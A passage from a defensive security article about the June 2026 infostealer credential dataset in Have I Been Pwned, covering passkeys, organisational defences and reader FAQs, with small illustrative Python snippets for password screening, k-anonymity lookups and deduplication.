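Alphanumeric output is used because some recovery forms reject punctuation; a service that accepts longer or richer answers can be given them.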

The slow migration away from passwords

The deepest response to stealer logs is to make the thing they steal worthless by design, and that is the promise of passkeys. A passkey replaces the shared password with a cryptographic key pair. The private key never leaves your device and is never transmitted to the service, so there is no shared secret stored anywhere that a stealer could harvest. When you authenticate, the device proves possession of the private key without ever revealing it. A stealer that copies everything on the machine cannot copy a passkey in a form that is usable elsewhere, which removes the entire harvest-and-replay model that infostealers depend on.
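The proof-of-possession idea can be illustrated with a deliberately tiny model. The sketch below is not WebAuthn and not how any real passkey is implemented: it uses unpadded textbook RSA over two small known primes purely so it runs on the standard library, and every name in it is hypothetical. What it shows is the shape of the exchange: the service holds only public values, issues a fresh challenge, and checks a signature that the device alone can produce.

```python
import hashlib

# Toy key built from two known Mersenne primes. Far too small, and unpadded,
# for real use; it exists only to make the flow executable.
P, Q = 2**127 - 1, 2**89 - 1
N = P * Q                           # public modulus, known to the service
E = 65537                           # public exponent, known to the service
D = pow(E, -1, (P - 1) * (Q - 1))   # private exponent, never leaves the device


def digest(origin: str, challenge: bytes) -> int:
    """Hash the site origin together with the challenge into a number below N."""
    data = origin.encode("utf-8") + b"\x00" + challenge
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % N


def device_sign(origin: str, challenge: bytes) -> int:
    """Runs on the user's device: the only place the private exponent D is used."""
    return pow(digest(origin, challenge), D, N)


def service_verify(origin: str, challenge: bytes, signature: int) -> bool:
    """Runs on the service: needs only the public values N and E."""
    return pow(signature, E, N) == digest(origin, challenge)
```

Because each login uses a new random challenge, a captured signature is of no use against the next one, and because the origin is part of what is signed, a response produced for a look-alike site does not verify at the real one. Nothing the service stores would let an attacker produce a valid response.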

The adoption numbers show this is no longer theoretical. By its 2026 World Passkey Day, the FIDO Alliance estimated around five billion passkeys in use worldwide, with awareness near universal at 90% of people surveyed, three-quarters having enabled a passkey on at least one account, and roughly half using them regularly where available. On the enterprise side, more than two-thirds of organisations reported deploying or actively rolling out passkeys for employee sign-ins. Major platforms and services across technology, finance and retail have shipped passkey support, and login success rates and speed have consistently come out ahead of passwords, with passkey sign-in markedly faster than a password and far faster than a password plus a second-factor code.

The security case is exactly the one stealer logs expose. Passkeys address both of the failures that the June 2026 dataset embodies: they cannot be phished, because there is no secret to trick a user into revealing and the credential responds only to the site it was registered with, and they cannot be reused or stuffed, because each is unique to a service and tied to the user’s device. For the two attacks that drive most credential-based breaches, phishing and the reuse of stolen passwords, passkeys remove the underlying vulnerability rather than mitigating it. That is why standards bodies now recognise them at high assurance levels and why regulators increasingly point toward phishing-resistant authentication as the expected baseline.

The migration is genuine but incomplete, and the gaps are where stealer logs keep their relevance. Passkey support has spread top-down, with the largest and most sophisticated platforms first and the long tail of smaller services lagging by years. Until a given account is actually protected by a passkey, it still relies on a password that a stealer can take, and most people will hold a mix of passkey-protected and password-protected accounts for a long time to come. Account recovery remains a weak point, since a poorly designed recovery flow can reintroduce a phishable fallback that undermines the passkey, and getting recovery right is one of the harder parts of a rollout.

There is also a real-world friction in coverage that tempers the optimism. Estimates of actual user adoption on major platforms, as opposed to awareness or enablement on a single account, sit lower, and projections see broad coverage across the long tail of websites taking several more years, with mainstream content and commerce platforms expected to add turnkey support only later in the decade. Passkeys are the clear direction of travel, not a finished destination, and the period in between is precisely when datasets like the June 2026 corpus matter, because passwords remain in wide use and remain stealable.

The honest framing is that passkeys are the structural fix for the problem stealer logs represent, and their spread is the most encouraging trend in this whole area, but they do not retroactively protect the credentials already harvested, and they do not yet cover the full breadth of services people use. The right individual response is to adopt passkeys wherever they are offered, especially on the highest-value accounts, while keeping the password habits described above for everything not yet covered. Over time, as coverage fills in, the harvest a stealer can take shrinks toward irrelevance. For now, the migration is partial, and the contents of the June 2026 logs are a reminder of how much of the internet still runs on the replayable secret that passkeys are built to retire.

Organisational changes worth making after a dataset like this

For a company, the June 2026 corpus is less an event to respond to than a prompt to check whether its defences match the way credential theft actually works now. The central shift in mindset, drawn straight from the threat data, is to stop assuming the perimeter is the line of defence and to assume that some valid credentials for your environment are already compromised, sitting in stealer logs harvested from employees’ and contractors’ devices. Verizon’s framing of “assume access, ready defences” captures it: plan for the attacker who logs in with a real credential rather than only for the one who breaks in.

The first practical change is at the login itself. Enforcing phishing-resistant authentication, ideally passkeys or hardware keys, for administrators and high-risk applications removes the value of a stolen password, because the password alone no longer grants access. Where full passwordless is not yet feasible, requiring strong multi-factor authentication and adding step-up challenges for risky sign-ins raises the bar substantially. Conventional MFA is not a complete answer given cookie theft, but a login protected only by a password is the easiest possible target, and closing that is the most valuable move available.

The second change is screening passwords at the point they are set. Integrating a check against known-compromised lists, such as the Pwned Passwords k-anonymity API, at account creation and password reset blocks users from choosing credentials that are already in the attackers’ dictionaries. Favouring length over arbitrary complexity rules and banning known-bad passwords aligns with current standards and closes off the single most exploited weakness, which is people reusing passwords already sitting in breach corpora.
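Screening at the point a password is set might look like the sketch below. It assumes a hypothetical policy with a minimum length of 12 characters (a value chosen here for illustration, not taken from the source) and takes the compromised-password lookup as a callable, so that a Pwned Passwords range query or a local list can be plugged in. The small in-memory blocklist is a stand-in for that lookup.

```python
import hashlib

MIN_LENGTH = 12  # assumed policy value, not a figure from the article


def sha1_hex(password: str) -> str:
    """Uppercase SHA-1 hex digest, the form breach corpora are usually keyed on."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def make_local_checker(known_bad_hashes: set[str]):
    """Build a lookup over a local set of digests (stand-in for a real service)."""
    return lambda password: sha1_hex(password) in known_bad_hashes


def check_new_password(password: str, is_compromised) -> list[str]:
    """Return the reasons to reject a candidate; an empty list means accept."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if is_compromised(password):
        problems.append("appears in a known-compromised list")
    return problems
```

There are no composition rules here on purpose: length and the known-bad check carry the policy, which matches the preference for length over arbitrary complexity described above.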

The third change is monitoring and speed of response. Because the gap between a credential appearing in a stealer log and its exploitation can be a matter of days, organisations need to monitor for their own domains and credentials surfacing in stealer-log datasets and be able to force credential and session resets quickly when they do. HIBP’s domain-monitoring and stealer-log APIs let an organisation see which of its users appear in the logs and which sites their credentials were captured against, turning exposure into a concrete remediation list. The critical detail, repeated throughout this analysis, is that proper remediation includes invalidating active sessions, not just resetting passwords, because a stolen cookie outlives a password change.
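Turning exposure data into a remediation list is mostly a matter of sorting and pairing each finding with the right actions. The sketch below assumes a hypothetical input shape, a mapping from user address to the site domains their credentials were captured against; it is not the response format of any HIBP endpoint, and the class and function names are illustrative.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Task:
    user: str
    site: str
    corporate: bool
    # Both steps are listed because a stolen cookie outlives a password change.
    actions: tuple = ("reset password", "revoke active sessions")


def remediation_list(exposures: dict[str, list[str]], corporate_sites: set[str]) -> list[Task]:
    """Flatten per-user exposures into tasks, corporate systems first."""
    tasks = [
        Task(user, site, site in corporate_sites)
        for user, sites in exposures.items()
        for site in sites
    ]
    # False sorts before True, so corporate=True entries come first.
    return sorted(tasks, key=lambda t: (not t.corporate, t.user, t.site))
```

Sorting corporate systems to the top reflects the short gap between capture and exploitation: the logins that open the organisation's own environment are handled before the personal accounts that merely share a device with them.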

The fourth change addresses the unmanaged-device problem that Verizon’s data exposed so starkly. With a large share of corporate credentials in stealer logs coming from non-managed, personal devices, a clear policy on which devices can reach corporate systems, backed by conditional access that checks device posture, is no longer optional. The report’s blunt warning was that an organisation which does not choose a bring-your-own-device policy will have one chosen for it. Controlling access for unmanaged, contractor and partner devices closes a path that endpoint defences on company-owned machines never touched.

Underpinning all of this is the treatment of credentials as volatile, high-risk assets rather than static identifiers. Short-lived credentials, tightly scoped access, aggressive rotation of keys and tokens, and the elimination of long-lived hardcoded secrets all reduce the value and lifespan of anything a stealer manages to harvest, including the machine identities that developers’ devices carry. The secrets-sprawl data, with tens of millions of new hardcoded credentials reaching public code each year, shows how large this surface has become and why it deserves dedicated attention.

The honest organisational summary is that defending against stealer logs is not a single product purchase but an alignment of authentication, password hygiene, monitoring, device policy and credential management around one assumption: that the credential is the target, that some credentials are already gone, and that the job is to make a stolen credential worth as little as possible. The June 2026 dataset is a useful occasion to test that alignment, because somewhere in those addresses are the corporate logins that an attacker may already be holding.

Open questions this dataset cannot settle

For all the detail available, a stealer-log corpus leaves important questions unanswered, and being clear about those limits is part of reading it honestly. The most basic is when the credentials were actually stolen. HIBP added the data on 15 June 2026, but the platform did not specify when the underlying theft occurred, and the recirculating nature of stealer data means the credentials could span a wide range of dates, from recent infections to material harvested years earlier. The load date is a fact; the theft date, for any given credential, is mostly unknown.

A related unknown is which malware families produced the data. Because the corpus is an aggregation from many sources, no single attribution is meaningful, and HIBP did not claim one. The dataset is the combined output of a market rather than the work of one tool, which means questions like “which stealer should I worry about” are the wrong frame; the relevant fact is that the credentials were harvested from infected devices, not which specific program did the harvesting.

The duplication question cannot be fully resolved either, even with deduplication. The 86% crossover with existing HIBP data tells us most of the addresses were seen before, but it does not tell us how much of the password data is genuinely fresh exposure versus old credentials already changed, nor how many of the affected people have since cleaned their devices and rotated their credentials. A credential in the corpus might be live and dangerous, or long since retired and harmless, and the dataset alone cannot distinguish the two for any individual. Only the person checking can know whether a flagged password is still in use.

There is a deeper measurement problem about true scale. The deduplicated figures are honest, but they describe only the data that reached HIBP through the public and semi-public channels that researchers monitor. How much stealer output never surfaces publicly, sits in private paid groups, or is held by criminals with no reason to dump it, is unknowable. The visible corpus is a sample of a larger, partly hidden whole, which means absence from it is weak evidence of safety, and the real volume of harvested credentials is certainly larger than any public dataset shows.

The effectiveness of the emerging defences over time is also genuinely open. Device-bound session credentials and passkeys are promising, but their real-world impact depends on adoption rates across the long tail of services, on how recovery flows are designed, and on how the criminal market adapts. The history of this field is a cat-and-mouse pattern in which each defence raises the cost and the attackers route around it, as the rapid bypass of Chrome’s application-bound encryption showed. Whether device binding and passwordless authentication break that pattern or merely shift it is a question only the next few years will answer.

Finally, the dataset cannot tell any reader the one thing they most want to know, which is their own true risk. Appearing in the corpus confirms a past exposure but not current danger; absence confirms no known exposure but not safety. The evidence supports a posture of caution and concrete action, not a precise personal verdict. That uncertainty is not a flaw in the data so much as a property of the problem: credential theft is a continuous, partly hidden, recirculating phenomenon, and any single snapshot of it, however well prepared, can only ever be a partial and time-bound view.

The direction credential theft is heading

The June 2026 corpus is a single data point in a trend that has been building for years and shows no sign of reversing, and the trend matters more than the dataset. The defining shift is the one this entire analysis has traced: credential theft has moved from breaking into companies toward harvesting individuals, and the infostealer is the instrument of that shift. Attackers increasingly bypass organisations altogether and collect credentials directly from users’ devices, creating a fresh and simpler path to account takeover and to the larger attacks that follow. That redirection is the structural story, and it is what makes datasets like this one a recurring feature rather than an aberration.

The volume is rising, not falling. Estimates put the credentials stolen by infostealers in 2025 in the billions, with tens of millions of devices infected and the number of stealer packages processed climbing sharply year on year. The market’s resilience is the core problem: it runs as a commercial service, new brands launch for a few hundred dollars, and each law-enforcement takedown is followed by successors filling the gap. Supply-side enforcement is real and worthwhile, raising costs and disrupting operations, but it has repeatedly proven unable to end a business model with such favourable economics. As long as replayable secrets are the basis of authentication and demand for stolen logins keeps climbing, the supply will keep being met.

Two forces will shape the next phase, pulling in opposite directions. On the defensive side, the migration to phishing-resistant authentication is the development most likely to bend the curve, because passkeys and device-bound sessions attack the harvest-and-replay model at its root rather than mitigating its symptoms. If coverage spreads across the long tail of services over the coming years, the credentials a stealer can usefully take will shrink, and the value of a corpus like this one will erode. That is the optimistic trajectory, and it is genuinely underway, with billions of passkeys already in use and standards bodies and regulators pushing in the same direction.

On the offensive side, the attackers are adapting in step. They have bypassed browser hardening, built malware that targets authentication seed values and session cookies specifically, expanded onto macOS, and refined social-engineering lures like paste-and-run that need no technical exploit at all. The same automation and tooling that make defence more scalable also make attacks faster and cheaper, and the compression of the gap between a credential’s theft and its exploitation, now measured in days, leaves an ever-shorter window for detection. The contest is between defences that remove the value of stolen credentials and attacks that harvest them faster and route around each new protection.

The realistic near-term outlook is a long, uneven transition rather than a clean resolution. Passwords will persist across much of the internet for years, which means stealer logs will keep accumulating and recirculating, and datasets like the June 2026 corpus will keep landing with depressing regularity. At the same time, the highest-value and most-used services will continue moving to passwordless authentication, gradually carving the most dangerous credentials out of the harvest. The two trends will coexist, and individual and organisational risk will increasingly depend on how far along that transition each person and each company has travelled.

The practical conclusion for a reader is the one that has run through every section. You cannot stop the firehose, but you can make your own credentials worthless to it. Unique passwords behind a manager, phishing-resistant authentication wherever it is offered, caution at the moments the lures exploit, session hygiene, and a clean device turn an appearance in a stealer log from a crisis into a footnote. The June 2026 dataset is a reminder that the threat is structural, continuous and personal, sitting on the device in front of you rather than on a distant server. It is also a reminder that the tools to render it harmless already exist, are spreading fast, and are available to anyone willing to change a few habits before the next corpus, which is already being assembled, lands.

Questions people ask after finding their data in a stealer log

What is the June 2026 Stealer Logs dataset?

It is a collection added to Have I Been Pwned on 15 June 2026 containing about 56.3 million unique email addresses and roughly 124 million unique passwords. The data was compiled from hundreds of millions of stealer-log records harvested from malware-infected devices, then deduplicated before loading. The passwords were added to the Pwned Passwords service, and the addresses to the searchable breach database.

Where did the 124 million passwords actually come from?

They came from individual computers infected with infostealer malware, not from a breach of any single company’s servers. The malware copied saved credentials, browser data and other secrets from each infected device, and those logs were aggregated by criminals and eventually collected by researchers who passed a cleaned corpus to Have I Been Pwned. The defining feature of this data is that the victims are individual people whose own machines were compromised.

Does my password appearing here mean a website I use was hacked?

No. The presence of credentials for a service in a stealer log means users of that service were infected, not that the service itself was breached. This is the exact misreading behind episodes like the October 2025 “Gmail breach” scare, where infostealer data containing Gmail logins was wrongly reported as an attack on Google. A domain in a stealer corpus points at infected users, not a hacked company.

How do I check whether I am affected?

Go to the Have I Been Pwned website directly and enter your email address rather than clicking any link in an email claiming to check for you, because those links are a common phishing trap after a publicised dataset. For passwords, use the Pwned Passwords feature, which most reputable password managers can run across your whole vault automatically. If you sign up for the site’s free notifications, you will be told if your address appears in future loads.

What should I do first if I have been exposed?

Begin with the device itself, because if it is still infected, every new password you set will be captured as you type it. After securing or replacing the machine, change passwords starting with your email account, then financial accounts, then work logins, then everything else, making each one unique. Enable the strongest available second factor and sign out of all active sessions to invalidate any stolen cookies.

What is an infostealer?

It is a type of malware designed to run briefly on a device, scoop up saved credentials, browser cookies, autofill data, cryptocurrency wallets and other secrets, send them to the operator, and often delete itself. Most are sold as a subscription service to criminals who do not need technical skill to use them. The output of these tools is the stealer log that ends up in datasets like this one.

How do devices get infected in the first place?

Almost always because the person at the keyboard runs something they should not, rather than through a hidden technical exploit. The dominant recent lure is paste-and-run, where a fake verification or error page instructs the user to copy a command and paste it into a system dialog, which installs the malware. Cracked software, game cheats, fake updates and malicious ads are the other common routes.

Will my antivirus protect me?

Not reliably. Research into infected devices found that a large majority of infections happened on machines that had antivirus or endpoint protection running, because evasion is a built-in feature of the malware and because a user who willingly executes the payload bypasses many defences. Security software helps, but it is not the guarantee most people assume.

Are Apple computers safe from this?

No. macOS now has its own active stealer families, including Atomic, Poseidon, Odyssey and MacSync, several spreading through the same lures used against Windows. One macOS stealer was priced as a premium product precisely because Apple users tend to be higher-value targets. The belief that a Mac is immune is outdated.

My accounts have two-factor authentication, so why am I at risk?

Because stealers also capture session cookies, the small files that keep you logged in after you have already passed a second factor. An attacker who imports a stolen cookie can often resume your session without needing the password or the second factor at all, since both were already satisfied when the cookie was issued. This is why remediation must invalidate active sessions, not just reset passwords.

Is it safe to type my password into a checking tool?

Pwned Passwords is designed so you never have to. It uses a method called k-anonymity: your software hashes the password locally with SHA-1 and sends only the first five hexadecimal characters of that hash to the server, which returns the suffixes of every known hash that starts with those characters for you to compare on your own device. The full password and its complete hash never leave your machine.
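The prefix-and-suffix exchange can be sketched in a few lines of Python. This is a minimal illustration under stated assumptions, not the service's own client: the function names are hypothetical, and `fetch_range` stands in for whatever HTTP call retrieves the response body for a prefix (to my understanding the public endpoint is `https://api.pwnedpasswords.com/range/<prefix>`, returning one `SUFFIX:COUNT` pair per line). Nothing here touches the network, so it can be run safely as written.

```python
import hashlib
from typing import Callable


def split_hash(password: str, prefix_len: int = 5) -> tuple[str, str]:
    """Hash the password locally with SHA-1 and split the hex digest.

    Only the short prefix is meant to be sent anywhere; the suffix stays local.
    """
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:prefix_len], digest[prefix_len:]


def parse_range_response(body: str) -> dict[str, int]:
    """Parse lines of the assumed form 'SUFFIX:COUNT' into a lookup table."""
    counts: dict[str, int] = {}
    for line in body.splitlines():
        suffix, sep, count = line.strip().partition(":")
        if sep and suffix:
            counts[suffix.upper()] = int(count)
    return counts


def pwned_count(password: str, fetch_range: Callable[[str], str]) -> int:
    """Return how often the password appears, comparing suffixes locally.

    fetch_range is a hypothetical callable that takes the 5-character prefix
    and returns the response body as text.
    """
    prefix, suffix = split_hash(password)
    return parse_range_response(fetch_range(prefix)).get(suffix, 0)
```

In real use, `fetch_range` would wrap an HTTPS request. Passing it in as a parameter keeps the sketch testable offline and makes it obvious that the prefix is the only value that crosses the network boundary.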

Should I change every password I have?

If your device was infected, the safe assumption is that every credential saved in that browser at the time is compromised, so changing them all is reasonable, prioritising the highest-value accounts first. At minimum, change any password that Pwned Passwords flags as exposed and any that you have reused across multiple sites. Use the opportunity to make every password unique going forward.
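Spotting reuse is easy to automate once a vault is exported. The sketch below assumes a hypothetical export shaped as `(site, password)` pairs; real password managers use their own export formats and most have a built-in reuse audit, so treat this only as an illustration of the idea.

```python
from collections import defaultdict
from typing import Iterable


def find_reused(vault: Iterable[tuple[str, str]]) -> list[list[str]]:
    """Group sites that share the same password.

    vault is a hypothetical export of (site, password) pairs. The result is a
    sorted list of site groups, one group per password used on 2+ sites.
    """
    sites_by_password: dict[str, list[str]] = defaultdict(list)
    for site, password in vault:
        sites_by_password[password].append(site)
    return sorted(
        sorted(sites) for sites in sites_by_password.values() if len(sites) > 1
    )


# Invented sample data for illustration only.
sample_vault = [
    ("mail.example", "S3cret!"),
    ("bank.example", "S3cret!"),
    ("forum.example", "something-else"),
    ("shop.example", "S3cret!"),
]
reused_groups = find_reused(sample_vault)
```

Every site in a returned group should get a new, unique password, starting with the highest-value account in the group.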

Why does a password manager matter so much here?

Because unique passwords are the single most effective defence against the reuse that turns one stolen credential into many break-ins, and no one can sustain unique passwords by memory. A manager generates and stores them, audits your whole vault against known-compromised lists in one pass, and keeps credentials behind a master secret rather than exposed in the browser. It is the practical foundation that makes the rest of the advice workable.

Are passkeys the real solution?

They are the closest thing to a structural fix. A passkey replaces the shared password with a cryptographic key pair whose private half stays with your device or credential manager and is never sent to the service, so there is no reusable secret for a stealer to harvest from a login form. Passkeys cannot be phished or replayed in credential-stuffing attacks, which removes the two attacks that drive most credential breaches, though coverage across all the services people use will take years to complete.

What is device-bound session protection?

It is a technology, available in Chrome on Windows from April 2026 as Device Bound Session Credentials, that ties a login session to the specific device that created it using hardware-backed keys. A session cookie stolen from such a device stops working when an attacker tries to use it elsewhere. It protects sessions only, does nothing for already-stolen data, and works only where the website has also implemented it.

Why do I keep seeing headlines about billions of leaked passwords?

Because the stealer-log world produces aggregations, huge piles of recycled data merged from many sources, and coverage often reports the inflated row count rather than the deduplicated number of distinct people and passwords. Compilations branded as sixteen or twenty-six billion records typically collapse to far smaller unique figures once duplication is stripped out. The honest numbers are the unique counts, such as the 56.3 million addresses and 124 million passwords in this dataset.
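The gap between a row count and a unique count is easy to see with a toy example. The sketch below uses invented rows and a hypothetical `summarise` helper. Lower-casing and trimming the addresses before counting is my own assumption about normalisation, not a description of how Have I Been Pwned processes its loads.

```python
from typing import Iterable


def summarise(rows: Iterable[tuple[str, str]]) -> dict[str, int]:
    """Compare the raw row count with the deduplicated counts.

    rows are (email, password) pairs as they might appear in merged logs.
    Emails are trimmed and lower-cased before counting (an assumption).
    """
    rows = list(rows)
    unique_emails = {email.strip().lower() for email, _ in rows}
    unique_passwords = {password for _, password in rows}
    return {
        "rows": len(rows),
        "unique_emails": len(unique_emails),
        "unique_passwords": len(unique_passwords),
    }


# Invented rows: the same credential captured repeatedly across merged logs.
sample_rows = [
    ("a@example.com", "hunter2"),
    ("A@example.com", "hunter2"),
    ("a@example.com", "hunter2"),
    ("b@example.com", "letmein"),
    ("b@example.com", "hunter2"),
]
summary = summarise(sample_rows)
```

Five rows here reduce to two distinct addresses and two distinct passwords, which is the same effect, at a vastly larger scale, that shrinks a multi-billion-row compilation to its unique figures.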

Is this data new, or just recycled from old leaks?

It is a mix, which is normal for stealer logs. About 86% of the email addresses in this set were already known to Have I Been Pwned from earlier data. That leaves roughly 14% of the 56.3 million, or about 8 million addresses, as first-seen, so the genuinely fresh exposure is smaller than the headline implies. The data recirculates indefinitely, which means an appearance can reflect an old infection as easily as a recent one.

What does it mean if my check comes back clean?

It means your address has not appeared in the data Have I Been Pwned has loaded and verified, which is reassuring but not a guarantee of safety. Plenty of stolen data never reaches the service or sits in private criminal channels, so absence is weak evidence rather than proof. The preventive habits of unique passwords, strong authentication and a clean device apply regardless of the result.

How does this affect businesses, not just individuals?

A large share of corporate credential theft now originates on employees’ personal, unmanaged devices, where work and personal logins are saved in the same browser. Verizon’s 2025 Data Breach Investigations Report ranks stolen credentials as the top initial access vector into organisations, and infected personal machines are a major source of them. The data also carries developers’ keys and tokens, which can expose company infrastructure far beyond a single password.

What extra risk do developers and executives face?

Their devices tend to hold credentials worth far more than ordinary passwords: SSH keys, cloud tokens, API keys and access to code repositories for developers, and authority over financial and strategic systems for executives. A single infection of such a person can hand an attacker access to systems that many others depend on. Remediation for them goes beyond passwords to rotating keys, revoking tokens and auditing access.

Author:
Jan Bielik
CEO & Founder of Webiano Digital & Marketing Agency

This article is an original analysis supported by the sources cited below

Have I Been Pwned: June 2026 Stealer Logs. The primary record for the dataset, detailing the 56.3 million unique email addresses and 124 million unique passwords harvested from infostealer-infected devices and loaded on 15 June 2026.

Have I Been Pwned: Pwned Passwords. The service that received the 124 million passwords, with an explanation of the k-anonymity model that lets anyone check a password without exposing it.

Experimenting with stealer logs in Have I Been Pwned. Troy Hunt’s account of why and how stealer logs are loaded into the service, including the reasoning behind the email and website domain search features.

Inside the Synthient threat data. A detailed walkthrough of a large stealer-log and credential-stuffing corpus, illustrating the high duplication rates and deduplication challenges that also apply to the June 2026 set.

Validating leaked passwords with k-anonymity. Cloudflare’s technical explanation of the prefix-based method that powers Pwned Passwords, written by the engineer who contributed the approach.

Have I Been Pwned adds 284M accounts stolen by infostealer malware. Coverage of the earlier ALIEN TXTBASE stealer corpus, a useful reference point for how these datasets are sourced, sized and reported.

Google Chrome adds infostealer protection against session cookie theft. A report on Device Bound Session Credentials in Chrome, covering how the feature binds sessions to a device and the limits of its initial Windows-only rollout.

124 million stolen passwords discovered, check your accounts now. Consumer-facing coverage of the June 2026 dataset, including practical guidance on checking exposure and responding to it.

Have I Been Pwned: infostealer passwords, 124M. Reporting on the dataset that emphasises the shift from corporate breaches to credentials stolen directly from victims’ machines.

Disrupting Lumma Stealer: Microsoft leads global action against a favored cybercrime tool. Microsoft’s account of the May 2025 operation against Lumma, including the figure of over 394,000 infected Windows devices and roughly 2,300 seized domains.

Lumma Stealer: breaking down the delivery techniques and capabilities of a prolific infostealer. A technical analysis of how Lumma is distributed and what it harvests, including its use of ClickFix and abuse of legitimate platforms.

Red Canary Threat Detection Report: information stealers. A trend analysis of the infostealer category, covering the malware-as-a-service model, leading families and common delivery methods.

Infostealers bypass new Chrome security feature. Research showing how quickly stealers defeated Chrome’s application-bound encryption, a case study in the cat-and-mouse pattern of credential theft defences.

Google just fixed session cookie theft in Chrome: here is what it still cannot stop. An assessment of what Device Bound Session Credentials does and does not protect, alongside data on the contents of modern stealer logs.

Infostealer malware and credential theft in 2025. A broad overview of the infostealer threat with statistics on infection volumes, families and the economics of the stolen-credential trade.

The stealer log ecosystem. An explanation from the threat-intelligence team behind several recent corpora of how logs are produced, aggregated and recirculated before reaching services like Have I Been Pwned.

Verizon 2025 Data Breach Investigations Report. The annual report establishing stolen credentials as the top initial access vector and documenting the role of infostealer logs and unmanaged devices in corporate compromise.

Verizon 2025 Data Breach Investigations Report (full report). The complete report, with the underlying figures on credential reuse, ransomware and the blurring of personal and corporate exposure.

FIDO Alliance reports accelerating global passkey adoption on World Passkey Day 2026. Adoption data for passkeys, including the estimate of around five billion in use and survey figures on awareness and enablement.

NIST Digital Identity Guidelines. The standards setting out requirements for phishing-resistant authentication and the recommendation to screen new passwords against lists of compromised values.

The State of Secrets Sprawl 2026. Findings on the tens of millions of new hardcoded secrets reaching public code each year and the rapid growth of leaks tied to AI services, relevant to the high-privilege credentials on developers’ machines.

Microsoft Digital Defense Report 2025. An overview of identity-based attacks and the surge in infostealer use, with the finding that phishing-resistant multi-factor authentication blocks the large majority of identity attacks.